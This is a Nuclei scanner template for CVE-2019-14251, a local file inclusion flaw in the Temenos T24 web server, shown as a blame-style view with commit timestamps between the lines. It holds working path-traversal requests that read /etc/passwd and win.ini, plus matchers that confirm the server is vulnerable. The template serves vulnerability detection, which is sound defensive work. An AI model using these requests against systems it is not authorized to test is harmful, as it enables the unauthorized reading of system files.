2022-07-07 21:58:09 +00:00
|
|
|
id: CVE-2019-14251
|
|
|
|
|
|
|
|
info:
|
2022-07-26 13:45:11 +00:00
|
|
|
name: T24 Web Server - Local File Inclusion
|
2022-07-07 21:58:09 +00:00
|
|
|
author: 0x_Akoko
|
|
|
|
severity: high
|
2022-07-26 13:45:11 +00:00
|
|
|
description: T24 web server is vulnerable to unauthenticated local file inclusion that permits an attacker to exfiltrate data directly from server.
|
2022-07-07 21:58:09 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/kmkz/exploit/blob/master/CVE-2019-14251-TEMENOS-T24.txt
|
|
|
|
- https://vuldb.com/?id.146815
|
2022-07-26 13:45:11 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-14251
|
2022-07-10 05:18:52 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cve-id: CVE-2019-14251
|
|
|
|
cwe-id: CWE-22
|
2022-07-09 20:35:44 +00:00
|
|
|
tags: cve,cve2019,temenos,lfi,unauth
|
2022-07-07 21:58:09 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2022-07-09 20:35:44 +00:00
|
|
|
- "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd"
|
2022-07-07 21:58:09 +00:00
|
|
|
- "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:.*:0:0:"
|
|
|
|
- "for 16-bit app support"
|
|
|
|
condition: or
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-07-26 13:45:11 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/07/13
|